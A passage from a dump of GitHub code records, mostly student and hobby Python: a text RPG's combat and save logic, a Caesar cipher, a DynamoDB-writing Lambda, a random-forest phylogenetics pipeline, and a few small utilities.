skill_damage[spell]\n monsterhp -= player_damage\n print(f\"You used {spell}, it does {player_damage} damage.\")\n player.mana -= skill_cost[spell]\n else:\n print(\"\\nYou missed!\")\n player.mana -= skill_cost[spell]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"\\nYou missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n if player.health < 0:\n break\n elif player.p_class == \"Rogue\":\n print(\"Do you want to [Attack], use a [Skill], or use a [Potion]\")\n move = input(\"> \").title()\n if move == \"Skill\":\n print(player.skills)\n skill = rogue_input()\n if skill in player.skills:\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = skill_damage[skill]\n monsterhp -= player_damage\n print(f\"You used {skill}, it does {player_damage} damage.\")\n player.mana -= skill_cost[skill]\n else:\n print(\"You missed!\")\n player.mana -= skill_cost[skill]\n elif move == \"Attack\":\n roll = random.randint(1,10)\n hit = roll\n if hit != 3 or hit != 7:\n player_damage = weapons[player.curr_weapon]\n print(f\"\\nYou used {move}, it does {player_damage} damage.\")\n monsterhp -= player_damage\n else:\n print(\"You missed!\")\n elif move == \"Potion\":\n use_potion(player)\n else:\n print(\"This action is unavailable!\")\n enemy_damage = random.randint(1, 8)\n print(\n f\"\\nIt is now the monster's turn.\\nThe monster attacks. It does {enemy_damage} damage.\\n\"\n )\n player.health = player.health - enemy_damage\n player.xp += 15\n player.gold += 70\n\n\n\ndef use_inventory(player: Player) -> None:\n print(\"\\nThis is your inventory and stats.\")\n print(f\"Player Health: {player.health}\")\n print(f\"Player mana: {player.mana}\")\n print(f\"Player Level: {player.level}\")\n print(f\"Player XP: {player.xp}\")\n print(f\"Player Gold: {player.gold}\")\n print(f\"Health Potion: {player.health_potion}\")\n print(f\"Mana Potions: {player.mana_potion}\")\n for item in player.inventory:\n print(f\"{item}: {weapons[item]}\")\n print(f\"You are currently using a {player.curr_weapon}\")\n action = input(\"Do you want to [Equip] or go [Back]? \").title()\n if action == \"Equip\":\n equip = input(\"What do you want to equip? \").title()\n if equip in player.inventory:\n player.curr_weapon = equip\n elif equip == player.curr_weapon:\n print(\"You are already using this weapon.\")\n else:\n print(\"You do not have this item.\")\n elif action == \"Back\":\n return\n else:\n print(\"Not Valid\")\n\n\nstart_location = \"Oakland\"\n\n\ndef main():\n location = start_location\n player = Player(\"\", 100, 100, 100, 100, \"\", \"\", 1, 0, 99999, 1, \"God Sword\", 10, 10, [], [], 'Oakland', '')\n while True:\n start = input(\"Would you like to start a [New Game] or [Load]? \").title()\n if start == \"New Game\":\n char_create(player)\n break\n elif start == \"Load\":\n load = input(\"Player name: \")\n try:\n with open(f\"{load}/player_data.txt\", \"rb\") as file:\n player = pickle.load(file)\n with open(f\"{load}/location.txt\", \"rb\") as file:\n location = pickle.load(file)\n break\n except FileNotFoundError:\n print(\"There is not a save for this person.\")\n if location == \"Forrest1\" or location == \"Forrest3\":\n a=(1,2,3,4)\n loc=choice(a)\n print(forrest[loc])\n else:\n print(towns[location])\n while player.health > 0:\n if player.end=='END':\n print('You won the game!')\n break\n print(\"What would you like to do?\")\n if (\n location == \"Waverly\"\n or location == \"Riverside\"\n or location == \"Oakland\"\n or location == \"Kingston\"\n ):\n act = input(\"[Move], [Inventory], [Potion], [Save], [Shop], [Quit]\\n> \").title()\n else:\n act = input(\"[Move], [Inventory], [Potion], [Save], [Quit]\\n> \").title()\n if act == \"Inventory\":\n use_inventory(player)\n elif act == \"Potion\":\n use_potion(player)\n elif player.xp >= 100:\n level_up(player)\n elif player.level == 10:\n promotion(player)\n elif act == \"Add Level\":\n player.level += 1\n elif act == \"Save\":\n try:\n os.mkdir(player.name)\n except FileExistsError:\n pass\n with open(f\"{player.name}/player_data.txt\", \"wb\") as file:\n pickle.dump(player, file)\n with open(f\"{player.name}/location.txt\", \"wb\") as file:\n pickle.dump(location, file)\n elif act == \"Move\":\n location = move(location, player)\n if random_encounter():\n combat(player)\n elif player.health <= 0:\n print(\"You have died.\")\n else:\n print(\"You cannot do that.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"rbennett1435/Unit-2-Project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":50183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36058608912","text":"import logo\n\nalphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n\nprint(logo.logo)\n\ndirection = input(\"Type 'encode' to encrypt, type 'decode' to decrypt:\\n\")\ntext = input(\"Type your message:\\n\").lower()\nshift = int(input(\"Type the shift number:\\n\"))\nalphabet_length = len(alphabet)\n\ndef encrypt(user_text, user_shift):\n encrypted_text = \"\"\n\n for letter in user_text: # Looping through the whole text\n \n if letter == ' ': # Check for space character\n encrypted_text += ' ' # Append spaces as is\n continue # Move to the next iteration\n\n if letter not in alphabet:\n encrypted_text += letter\n continue\n\n index = alphabet.index(letter) # Getting index of each letter\n\n if direction == 'encode':\n new_index = (index + user_shift) % alphabet_length # modulo will give the remainder\n elif direction == 'decode':\n new_index = (index - user_shift) % alphabet_length\n else:\n print('Something went wrong... Check all the inputs and try again.')\n return\n\n letter = alphabet[new_index]\n encrypted_text += letter\n\n print(f'The result is: {encrypted_text}')\n\nif shift > alphabet_length:\n print('The shift cannot exceed the alphabet length!')\nelse:\n encrypt(text, shift)","repo_name":"Anveks/Python-Basics","sub_path":"small projects/caesar-cipher-app/cipher.py","file_name":"cipher.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"20390378522","text":"import boto3\nimport json\n\n# Establish a boto3 session\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n print(json.dumps(event)) \n # Parse incoming event\n #data = json.loads(event['body'])\n\n # Access the 'object_url' and 'labels' fields\n username = event['username']\n s3_url = event['object_url']\n tags = event['labels']\n\n # Specify your DynamoDB table\n table = dynamodb.Table('image_store')\n\n # Create a new item to insert into the table\n item = {\n 's3_url': s3_url,\n 'username': username,\n 'tags': tags\n }\n\n # Put the item into the table\n response = table.put_item(Item=item)\n\n # Return a response\n return {\n 'statusCode': 200,\n 'body': 'Image stored successfully'\n }\n","repo_name":"yuliang1005/AWS-SERVERLESS-SERVICE","sub_path":"store_image_to_dynamo.py","file_name":"store_image_to_dynamo.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16133655176","text":"import argparse\r\nimport sys\r\n\r\nimport numpy as np\r\nimport utils\r\nsys.path.append(\"/groups/itay_mayrose/danaazouri/PhyAI/code/\")\r\nimport warnings\r\n\r\nwarnings.filterwarnings(\"ignore\") # TEMP\r\n\r\n#from defs import *\r\n\r\n#from utils.tree_functions import get_total_branch_lengths\r\n# from sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestRegressor, RandomForestClassifier\r\n# from sklearn import svm\r\n# from sklearn.metrics import *\r\n# from sklearn import preprocessing\r\n# from sklearn.model_selection import cross_val_score\r\nfrom statistics import mean, median\r\n#from figures.violin_for_grant import *\r\n#from figures.confidence_interval_dts import plot_pred_true\r\n#from figures.accXsize_boxplot import accXsize_boxplot\r\n\r\n##################\r\n###### defs ######\r\nLABEL = \"d_ll_{}\"\r\nOPT_TYPE = \"br\"\r\nKFOLD = 10 # \"LOO\"\r\nGROUP_ID = 'group_id'\r\nN_ESTIMATORS = 100\r\nC = 95\r\nFEATURE_SELECTION = False # temp for running backwards selection\r\n\r\n\r\n##################\r\n\r\n\r\ndef score_rank(df_by_ds, sortby, locatein, random, scale_score):\r\n '''\r\n find the best tree in 'sortby' (e.g., predicted as the best) foreach dataset and locate its rank in 'locatein' (e.g., y_test)\r\n '''\r\n best_pred_ix = df_by_ds[sortby].idxmax() # changed min to max!\r\n if random:\r\n best_pred_ix = np.random.choice(df_by_ds[sortby].index, 1, replace=False)[0]\r\n temp_df = df_by_ds.sort_values(by=locatein, ascending=False).reset_index() # changed ascending to False\r\n best_pred_rank = min(temp_df.index[temp_df[\"index\"] == best_pred_ix].tolist())\r\n best_pred_rank += 1 # convert from pythonic index to position\r\n if scale_score:\r\n best_pred_rank /= len(df_by_ds[sortby].index) # scale the rank according to rankmax\r\n\r\n return best_pred_rank\r\n\r\n\r\ndef get_cumsun_preds(df_by_ds):\r\n df_by_ds[\"pred\"] /= df_by_ds[\"pred\"].sum()\r\n assert round(df_by_ds[\"pred\"].sum()) == 1\r\n temp_df = df_by_ds.sort_values(by=\"pred\", ascending=False).reset_index()\r\n sorted_preds = temp_df[\"pred\"]\r\n cumsum_preds = sorted_preds.cumsum().values\r\n temp_df[\"pred\"] = cumsum_preds\r\n\r\n return temp_df\r\n\r\n\r\ndef get_cumsum_threshold(df_by_ds, label):\r\n temp_df = get_cumsun_preds(df_by_ds)\r\n best_pred_ix = df_by_ds[label].idxmax()\r\n cumsum_true_best = temp_df[temp_df[\"index\"] == best_pred_ix][\"pred\"].values[0]\r\n\r\n return cumsum_true_best\r\n\r\n\r\ndef calc_required_evaluations_score(grouped_df_by_ds, thresholds, c=C):\r\n cumsums = []\r\n threshold = np.percentile(thresholds, c)\r\n # print(\"***\",threshold)\r\n # plt.hist(thresholds)\r\n # plt.show()\r\n for group_id, df_by_ds in grouped_df_by_ds:\r\n cumulative_scores = get_cumsun_preds(df_by_ds)[\"pred\"].values\r\n res = round(100 * (len(np.where(cumulative_scores < threshold)[0])) / len(cumulative_scores), 2)\r\n cumsums.append(res)\r\n\r\n return cumsums\r\n\r\n\r\ndef ds_scores(df, move_type, random, scale_score):\r\n rank_pred_by_ds, rank_test_by_ds = {}, {}\r\n\r\n label = LABEL.format(move_type)\r\n sp_corrs, r2s, errs_down, errs_up, all_true, all_preds, thresholds = [], [], [], [], [], [], []\r\n grouped_df_by_ds = df.groupby(FEATURES[GROUP_ID], sort=False)\r\n for group_id, df_by_ds in grouped_df_by_ds:\r\n rank_pred_by_ds[group_id] = score_rank(df_by_ds, \"pred\", label, random, scale_score)\r\n rank_test_by_ds[group_id] = score_rank(df_by_ds, label, \"pred\", random, scale_score)\r\n\r\n all_true.append(df_by_ds[label].mean())\r\n pred = df_by_ds[\"pred\"].mean()\r\n all_preds.append(pred)\r\n # r2s.append(r2_score(df_by_ds[label], df_by_ds[\"pred\"], multioutput='variance_weighted'))\r\n temp_df = df_by_ds[[label, \"pred\"]]\r\n sp_corr = temp_df.corr(method='spearman').ix[1, 0]\r\n if sp_corr:\r\n if sp_corr < 0:\r\n print(group_id, sp_corr)\r\n sp_corrs.append(np.square(sp_corr))\r\n\r\n # compute 'confidence score'\r\n cumsum_true_best = get_cumsum_threshold(df_by_ds, label)\r\n thresholds.append(cumsum_true_best)\r\n\r\n required_evaluations_scores = calc_required_evaluations_score(grouped_df_by_ds, thresholds, c=C)\r\n\r\n return rank_pred_by_ds, rank_test_by_ds, sp_corrs, r2s, required_evaluations_scores\r\n\r\n\r\ndef split_features_label(df, move_type, features):\r\n attributes_df = df[features].reset_index(drop=True)\r\n label_df = df[LABEL.format(move_type)].reset_index(drop=True)\r\n\r\n x = np.array(attributes_df)\r\n y = np.array(label_df).ravel()\r\n\r\n return x, y\r\n\r\n\r\ndef apply_RFR(df_test, df_train, move_type, features):\r\n X_train, y_train = split_features_label(df_train, move_type, features)\r\n X_test, y_test = split_features_label(df_test, move_type, features)\r\n\r\n regressor = RandomForestRegressor(n_estimators=N_ESTIMATORS, max_features=0.33, oob_score=True).fit(X_train,\r\n y_train) # 0.33=nfeatures/3. this is like in R (instead of default=n_features)\r\n y_pred = regressor.predict(X_test)\r\n oob = regressor.oob_score_\r\n f_imp = regressor.feature_importances_\r\n\r\n all_DTs_pred = []\r\n # all_DTs_pred = [t.predict(X_test) for t in regressor.estimators_]\r\n # dev_vec = confidence_score(all_DTs_pred, y_pred, percentile=90)\r\n\r\n return y_pred, all_DTs_pred, oob, f_imp\r\n\r\n\r\ndef truncate(df):\r\n df = df.dropna()\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n kfold = len(groups_ids) if KFOLD == \"LOO\" else KFOLD\r\n assert len(groups_ids) >= kfold\r\n ndel = len(groups_ids) % kfold\r\n if ndel != 0: # i removed datasets from the end, and not randomly. from some reason..\r\n for group_id in groups_ids[:-ndel - 1:-1]:\r\n df = df[df[FEATURES[GROUP_ID]] != group_id]\r\n\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n new_length = len(groups_ids) - ndel\r\n test_batch_size = int(new_length / kfold)\r\n\r\n return df.reset_index(drop=True), groups_ids, test_batch_size\r\n\r\n\r\ndef cross_validation_RF(df, move_type, features, validation_set=False, random=False, scale_score=True):\r\n # '''\r\n df, groups_ids, test_batch_size = truncate(df)\r\n res_dict = {}\r\n oobs, f_imps, = [], []\r\n my_y_pred, imps = np.full(len(df), np.nan), np.full(len(df), np.nan)\r\n\r\n if not validation_set:\r\n for low_i in groups_ids[::test_batch_size]:\r\n low_i, = np.where(groups_ids == low_i)\r\n low_i = int(low_i)\r\n up_i = low_i + test_batch_size\r\n\r\n test_ixs = groups_ids[low_i:up_i]\r\n train_ixs = np.setdiff1d(groups_ids, test_ixs)\r\n df_test = df.loc[df[FEATURES[GROUP_ID]].isin(test_ixs)]\r\n df_train = df.loc[df[FEATURES[GROUP_ID]].isin(train_ixs)]\r\n\r\n y_pred, all_DTs_pred, oob, f_imp = apply_RFR(df_test, df_train, move_type, features)\r\n\r\n oobs.append(oob)\r\n f_imps.append(f_imp)\r\n my_y_pred[\r\n df_test.index.values] = y_pred # sort the predictions into a vector sorted according to the respective dataset\r\n\r\n df[\"pred\"] = my_y_pred\r\n\r\n else: # namely if validation set strategy, and not cross validation\r\n df_train = df\r\n df_test = pd.read_csv(dirpath + LEARNING_DATA.format(\"all_moves\", \"1_validation\"))\r\n df_test = fit_transform(df_test, move_type, rank=False).dropna()\r\n y_pred, all_DTs_pred, oob, f_imp = apply_RFR(df_test, df_train, move_type, features)\r\n\r\n oobs.append(oob)\r\n f_imps.append(f_imp)\r\n df_test[\"pred\"] = y_pred # the predictions vec is the same lengths of test set\r\n df = df_test\r\n # '''\r\n\r\n rank_pred_by_ds, rank_test_by_ds, corrs, r2s, required_evaluations_scores = ds_scores(df, move_type, random,\r\n scale_score)\r\n\r\n # averaged over cv iterations\r\n res_dict['oob'] = sum(oobs) / len(oobs)\r\n res_dict['f_importance'] = sum(f_imps) / len(f_imps)\r\n # foreach dataset (namely arrays are of lengths len(sampled_datasets)\r\n res_dict[\"rank_first_pred\"] = rank_pred_by_ds\r\n res_dict[\"rank_first_true\"] = rank_test_by_ds\r\n res_dict[\"spearman_corr\"] = corrs\r\n res_dict['%neighbors'] = required_evaluations_scores\r\n\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n suf = \"_validation_set\" if validation_set else \"\"\r\n df.to_csv(dirpath + DATA_WITH_PREDS.format(str(len(features)) + suf)) # + \"_\" + features[0]\r\n return res_dict, groups_ids\r\n\r\n\r\ndef fit_transform(df, move_type, rank=False):\r\n scores_range = (1, 100)\r\n groups_ids = df[FEATURES[GROUP_ID]].unique()\r\n for group_id in groups_ids:\r\n scaling_factor = df[df[FEATURES[GROUP_ID]] == group_id][\"orig_ds_ll\"].iloc[0]\r\n df.loc[df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)] /= scaling_factor\r\n if rank:\r\n df.loc[df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)] = df.loc[\r\n df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)].rank(ascending=False) # , pct=True)\r\n\r\n # MinMaxScaler\r\n # s = df[LABEL.format(move_type)].values\r\n # s_scaled = ((s - s.min(axis=0)) / (s.max(axis=0) - s.min(axis=0))) * (scores_range[1] - scores_range[0]) + scores_range[0]\r\n # df[LABEL.format(move_type)] = s_scaled\r\n\r\n # df.loc[df[FEATURES[GROUP_ID]] == group_id, LABEL.format(move_type)].plot.hist(by=FEATURES[GROUP_ID])\r\n # plt.show()\r\n\r\n return df\r\n\r\n\r\ndef parse_relevant_summaries_for_learning(df_orig, outpath, move_type, step_number, all_moves=False):\r\n ds_path_init = df_orig.iloc[0][\"path\"]\r\n cols = list(pd.read_csv(SUMMARY_PER_DS.format(ds_path_init, move_type, OPT_TYPE, step_number)))\r\n cols.insert(1, \"path\")\r\n cols.extend([FEATURES[GROUP_ID], FEATURES[\"group_tbl\"]]) # add for group features\r\n df = pd.DataFrame(index=np.arange(0), columns=cols)\r\n\r\n for i, row in df_orig.iterrows():\r\n ds_path = row[\"path\"]\r\n ds_tbl = get_total_branch_lengths(ds_path + PHYML_TREE_FILENAME.format('bionj'))\r\n summary_per_ds = SUMMARY_PER_DS.format(ds_path, move_type, OPT_TYPE, step_number)\r\n print(summary_per_ds)\r\n if os.path.exists(summary_per_ds) and FEATURES[\"bl\"] in pd.read_csv(summary_per_ds).columns:\r\n df_ds = pd.read_csv(summary_per_ds)\r\n\r\n if all_moves:\r\n df_ds.insert(1, \"path\", ds_path)\r\n df_ds[FEATURES[GROUP_ID]] = str(i)\r\n df_ds[FEATURES[\"group_tbl\"]] = ds_tbl\r\n df = pd.concat([df, df_ds], ignore_index=True)\r\n else:\r\n grouped = df_ds.groupby(\"{}_name\".format(move_type), sort=False)\r\n for j, (name, group) in enumerate(grouped):\r\n best_row_group = list(\r\n group.ix[group[LABEL.format(move_type)].astype(float).idxmax()].values) # changed min to max!\r\n best_row_group.insert(1, ds_path)\r\n best_row_group.extend([str(i), ds_tbl]) # add group features\r\n df.ix[str(i) + \",\" + str(j)] = best_row_group\r\n\r\n df.to_csv(outpath)\r\n\r\n\r\ndef print_and_index_results(df_datasets, res_dict, move_type, sscore, features, val=False):\r\n #### score 1 ####\r\n spearman_corrs = res_dict['spearman_corr']\r\n df_datasets['corr'] = spearman_corrs\r\n print(\"\\nsapearman corr:\\n\" + \"mean:\", mean([e for e in spearman_corrs if not math.isnan(e)]), \", median:\",\r\n median(spearman_corrs))\r\n\r\n #### score 2 + 3 ####\r\n res_vec1 = np.asarray(list(res_dict['rank_first_pred'].values())) if type(res_dict['rank_first_pred']) is dict else \\\r\n res_dict['rank_first_pred']\r\n res_vec2 = np.asarray(list(res_dict['rank_first_true'].values())) if type(res_dict['rank_first_true']) is dict else \\\r\n res_dict['rank_first_true']\r\n scores_range = (1, 100) # for MinMaxScaler\r\n res_vec1_scaled = ((res_vec1 - res_vec1.min(axis=0)) / (res_vec1.max(axis=0) - res_vec1.min(axis=0))) * (\r\n scores_range[1] - scores_range[0]) + scores_range[0]\r\n res_vec2_scaled = ((res_vec2 - res_vec2.min(axis=0)) / (res_vec2.max(axis=0) - res_vec2.min(axis=0))) * (\r\n scores_range[1] - scores_range[0]) + scores_range[0]\r\n df_datasets['best_predicted_ranking'] = res_vec1_scaled\r\n df_datasets['best_empirically_ranking'] = res_vec2_scaled\r\n print(\"\\nbest predicted rank in true:\\n\" + \"mean:\", np.mean(res_vec1_scaled), \", median:\",\r\n np.median(res_vec1_scaled))\r\n print(\"\\nbest true rank in pred :\\n\" + \"mean:\", np.mean(res_vec2_scaled), \", median:\", np.median(res_vec2_scaled))\r\n\r\n #### score 4 ####\r\n res_vec2_scaled.sort()\r\n sorted_true_scaled = res_vec2_scaled[::-1]\r\n index95 = int(0.05 * len(sorted_true_scaled) - 1) # index for loc 0.05 = 95%\r\n required_evaluations = res_dict['%neighbors']\r\n df_datasets['required_evaluations_0.95'] = required_evaluations\r\n print(\"\\nIn 0.95: {}%\".format(sorted_true_scaled[index95]))\r\n print(\"\\nmean %neighbors (0.95): {}\".format(sum(required_evaluations) / len(required_evaluations)))\r\n\r\n # '''### feature importance ####\r\n mean_importances = res_dict['f_importance'] # index in first row only (score foreach run and not foreach dataset)\r\n for i, f in enumerate(features):\r\n colname = \"imp_\" + f\r\n df_datasets.loc[0, colname] = mean_importances[i]\r\n # print(\"\\nmean f importance:\\n\", np.column_stack((features, mean_importances)))\r\n\t# plot_cumulative_importance(features, mean_importances, move_type, sscore)\r\n # '''\r\n #### additional information ####\r\n df_datasets.loc[0, 'oob'] = res_dict['oob'] # index in first row only (score foreach run and not foreach dataset)\r\n print(\"oob:\", res_dict['oob'])\r\n print(\"ndatasets: \", len(res_vec1))\r\n\r\n suf = \"_validation_set\" if val else \"\"\r\n df_datasets.to_csv(dirpath + SCORES_PER_DS.format(str(len(features)) + suf)) # + \"_\" + features[0]\r\n print(\"##########################\")\r\n\r\n return\r\n\r\n\r\ndef sort_features(res_dict, features):\r\n feature_importances = [(feature, round(importance, 4)) for feature, importance in\r\n zip(features, res_dict['f_importance'])]\r\n feature_importances = sorted(feature_importances, key=lambda x: x[1], reverse=True) # most important first\r\n sorted_importances = [importance[1] for importance in feature_importances]\r\n sorted_features = [importance[0] for importance in feature_importances]\r\n\r\n return sorted_importances, sorted_features\r\n\r\n\r\ndef extract_scores_dict(res_dict, df_with_scores):\r\n ndatasets = len(df_with_scores)\r\n res_dict['rank_first_pred'], res_dict[\"rank_first_true\"] = df_with_scores['best_predicted_ranking'].values, \\\r\n df_with_scores['best_empirically_ranking'].values\r\n res_dict['spearman_corr'], res_dict['%neighbors'], res_dict['oob'] = df_with_scores['corr'].values, df_with_scores[\r\n 'required_evaluations_0.95'].values, df_with_scores.loc[0, 'oob']\r\n res_dict['f_importance'] = df_with_scores.loc[\r\n 0, df_with_scores.columns[pd.Series(df_with_scores.columns).str.startswith('imp_')]].to_numpy()\r\n\r\n return res_dict, ndatasets\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser(description='arrange data for learning and implement learning algo')\r\n parser.add_argument('--move_type', '-mt', default='prune') # could be 'prune' or 'rgft' or 'merged'\r\n parser.add_argument('--step_number', '-st', required=True) # counting from 1\r\n parser.add_argument('--validation_set', '-val', default=False,\r\n action='store_true') # whether to use validation set INSTEAD of cross validation\r\n parser.add_argument('--all_moves', '-all', default=False,\r\n action='store_true') # necessary only if we want to learn rgft on all\r\n parser.add_argument('--rank_target', '-rank', default=False, action='store_true')\r\n parser.add_argument('--score_for_random', '-random', default=False, action='store_true')\r\n parser.add_argument('--scale_score', '-sscore', default=False, action='store_true')\r\n args = parser.parse_args()\r\n\r\n dirpath = SUMMARY_FILES_DIR if platform.system() == 'Linux' else DATA_PATH\r\n df_orig = pd.read_csv(dirpath + CHOSEN_DATASETS_FILENAME, dtype=types_dict)\r\n\r\n move_type = args.move_type\r\n ifrank = \"\" if not args.rank_target else \"_rank\"\r\n ifall = \"\" if not args.all_moves else \"all_moves_\"\r\n if not move_type == \"merged\":\r\n df_path = dirpath + LEARNING_DATA.format(ifall + move_type, str(args.step_number))\r\n if not os.path.exists(df_path):\r\n parse_relevant_summaries_for_learning(df_orig, df_path, move_type, args.step_number,\r\n all_moves=args.all_moves)\r\n else: # parse ALL neighbors to create a merged df off all features of all neighbors\r\n df_path = dirpath + LEARNING_DATA.format(\"all_moves\", str(args.step_number))\r\n df_prune_features = dirpath + LEARNING_DATA.format(\"all_moves_prune\", str(args.step_number))\r\n df_rgft_features = dirpath + LEARNING_DATA.format(\"all_moves_rgft\", str(args.step_number))\r\n\r\n if not os.path.exists(df_path):\r\n parse_relevant_summaries_for_learning(df_orig, df_prune_features, \"prune\", args.step_number, all_moves=True)\r\n parse_relevant_summaries_for_learning(df_orig, df_rgft_features, \"rgft\", args.step_number, all_moves=True)\r\n shared_cols = FEATURES_SHARED + [\"path\", \"prune_name\", \"rgft_name\", \"orig_ds_ll\", \"ll\"]\r\n complete_df = pd.read_csv(df_prune_features, dtype=types_dict).merge(\r\n pd.read_csv(df_rgft_features, dtype=types_dict), on=shared_cols, left_index=True, right_index=True,\r\n suffixes=('_prune', '_rgft'))\r\n complete_df = complete_df.rename(columns={FEATURES[f]: FEATURES[f] + \"_rgft\" for f in FEATURES_RGFT_ONLY})\r\n complete_df[LABEL.format(move_type)] = complete_df[LABEL.format(\"prune\")]\r\n complete_df.to_csv(df_path)\r\n\r\n df_learnig = pd.read_csv(df_path, dtype=types_dict)\r\n df_learnig = fit_transform(df_learnig, move_type, rank=args.rank_target)\r\n\r\n features = FEATURES_PRUNE if move_type == \"prune\" else FEATURES_RGFT if move_type == \"rgft\" else FEATURES_MERGED\r\n features.remove(FEATURES[GROUP_ID])\r\n features_to_drop = []\r\n\r\n ########################\r\n\r\n for i in range(len(features)):\r\n suf = \"_validation_set\" if args.validation_set else \"\"\r\n csv_with_scores = dirpath + SCORES_PER_DS.format(str(len(features)) + suf)\r\n if not os.path.exists(csv_with_scores) or args.validation_set:\r\n print(\"*@*@*@* scores for {} features are not available, thus applying learning\".format(len(features)))\r\n res_dict, group_ids = cross_validation_RF(df_learnig, move_type, features,\r\n validation_set=args.validation_set, random=args.score_for_random,\r\n scale_score=args.scale_score)\r\n df_datasets = df_orig if not args.validation_set else pd.read_csv(\r\n DIRPATH + \"/validation_set2/summary_files/\" + CHOSEN_DATASETS_FILENAME)\r\n else:\r\n res_dict, ndatasets = extract_scores_dict({}, pd.read_csv(csv_with_scores, dtype=types_dict))\r\n print_and_index_results(df_datasets, res_dict, move_type, args.scale_score, features, args.validation_set)\r\n\r\n if not FEATURE_SELECTION:\r\n exit()\r\n else:\r\n sorted_importances, sorted_features = sort_features(res_dict, features)\r\n features = sorted_features[:-1]\r\n features_to_drop.append(sorted_features[-1])\r\n print(\"**dropped features:\", features_to_drop)\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"ozgranit/PhyAI","sub_path":"ML_workshop_RandomForest_pipline.py","file_name":"ML_workshop_RandomForest_pipline.py","file_ext":"py","file_size_in_byte":19872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22199422252","text":"import sys\nsys.path.append('..')\n\n\nimport asyncio\nimport async_state\nfrom async_state import *\n\nprint('testing async_state')\n\nmotor_state = AsyncState(['deenergized', 'moving', 'stopped_at_target'])\n\nprint(f'The current state is {motor_state}')\nprint(f'All possible states are {motor_state.possible_states}')\n\nasync def state_driver():\n input_states = ['moving', 'stopped_at_target', 'moving', 'stopped_at_target', 'deenergized']\n for s in input_states:\n await asyncio.sleep(1.0)\n print(f'Going to state {s}')\n await motor_state.set(s)\n\nasync def state_observer():\n print(f'Waiting for moving...')\n await motor_state.wait_for('moving')\n\n await asyncio.sleep(2.0)\n\n print(f'Waiting to arrive at target...')\n await motor_state.wait_for('stopped_at_target')\n\n await asyncio.sleep(2.0)\n\n print(f'Waiting to deenergize...')\n await motor_state.wait_for('deenergized')\n\n print(f'Done')\n\n\nloop = asyncio.get_event_loop()\n# asyncio.ensure_future(state_driver())\nasyncio.ensure_future(state_observer())\nloop.run_until_complete(state_driver())\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"deniz195/async_state","sub_path":"tests/test_basic.py","file_name":"test_basic.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"40717236995","text":"# https://wwlee94.github.io/category/algorithm/bfs-dfs/travel-route/\nfrom collections import defaultdict\n\ndef dfs(graph, start):\n route = []\n need_visit = [start]\n \n # 각 출발지를 두고 도착지 리스트를 순회\n while need_visit:\n node = need_visit[-1]\n if not graph[node]:\n route.append(need_visit.pop())\n else:\n need_visit.append(graph[node].pop(0))\n return route[::-1]\n\ndef solution(tickets):\n start = \"ICN\"\n graph = defaultdict(list)\n \n # 출발지, 도착지를 기준으로 graph 정의\n for departure, arrival in tickets:\n graph[departure].append(arrival)\n \n # 도착지를 이름 순으로 정렬\n for departure in graph.keys():\n graph[departure].sort()\n\n return dfs(graph, start)\n\n\nif __name__ == '__main__':\n tickets_lst = [[[\"ICN\", \"JFK\"], [\"HND\", \"IAD\"], [\"JFK\", \"HND\"]], \\\n [[\"ICN\", \"SFO\"], [\"ICN\", \"ATL\"], [\"SFO\", \"ATL\"], [\"ATL\", \"ICN\"], [\"ATL\",\"SFO\"]], \\\n [[\"ICN\", \"ATL\"], [\"ATL\", \"HND\"], [\"ATL\", \"IAD\"], ['IAD', 'ATL']]]\n \n for i, tickets in enumerate(tickets_lst):\n print(solution(tickets))","repo_name":"vg-rlo/TIL","sub_path":"Algorithm/programmers_travel_route.py","file_name":"programmers_travel_route.py","file_ext":"py","file_size_in_byte":1154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20573209592","text":"\nimport board\nimport adafruit_touchscreen as touchscreen\nimport time\n\n\nclass Touch:\n def __init__(self, throttle, debug=False):\n self._touchscreen = touchscreen.Touchscreen(\n board.TOUCH_XL, board.TOUCH_XR, board.TOUCH_YD, board.TOUCH_YU,\n calibration=((5200, 59000), (5800, 57000)), size=(320, 240))\n self._throttle = throttle\n self._last_touch_time = time.time()\n self._last_touch = None\n\n def touch_point(self):\n now = time.time()\n elapsed = now - self._last_touch_time\n\n # sometimes the first point is way off\n # taking the 2 samples that are close together\n points = []\n points.append(self._touchscreen.touch_point)\n points.append(self._touchscreen.touch_point)\n p0 = points[0]\n p1 = points[1]\n while 